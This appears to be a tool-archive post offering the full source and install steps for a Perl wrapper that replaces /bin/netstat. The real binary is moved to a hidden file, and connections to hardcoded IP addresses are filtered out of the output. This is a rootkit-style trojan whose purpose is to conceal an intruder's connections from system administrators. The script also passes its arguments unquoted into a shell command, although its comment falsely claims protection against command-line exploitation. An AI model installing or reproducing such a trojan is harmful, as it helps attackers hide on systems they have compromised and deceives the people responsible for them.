[TOOL] Perl netstat Wrapper



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Perl netstat Wrapper
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SUMMARY



DETAILS

wnetstat.pl is a nice and short perl wrapper around /bin/netstat which
hides harcoded ip from the console output.

how to use:
* Copy /bin/netstat /usr/local/bin/.ntst
* edit hardcoded IP in the source
* compile it with "perlcc -o /bin/netstat wnetstat.pl"

Tool Source:
#!/usr/bin/perl -w
#
# Simple wrapper around netstat (filters hardcoded IP)
# by bunker - http://rawlab.altervista.org
#
# Edit wnetstat.pl and change harcoded IP.
# Copy /bin/netstat in /usr/local/bin/.ntst.
#
# Compile the source with "perlcc -o /bin/netstat wnetstat.pl"
#
use strict;
# original netstat
my $ntst_orig = "/usr/local/bin/.ntst";

# hide these
my $hide = '127.0.0.1\|192.168.0.1';
# Wrap
# and work with I/O redirection to avoid command line exploitation
system "$ntst_orig @ARGV 2>&1 | grep -v \"$hide\" 2>/dev/null";

#EoF


ADDITIONAL INFORMATION

The information has been provided by <mailto:bunker@xxxxxxxxxxxxx>
bunker.
To keep updated with the tool visit the project's homepage at:
<http://rawlab.altervista.org/> http://rawlab.altervista.org/



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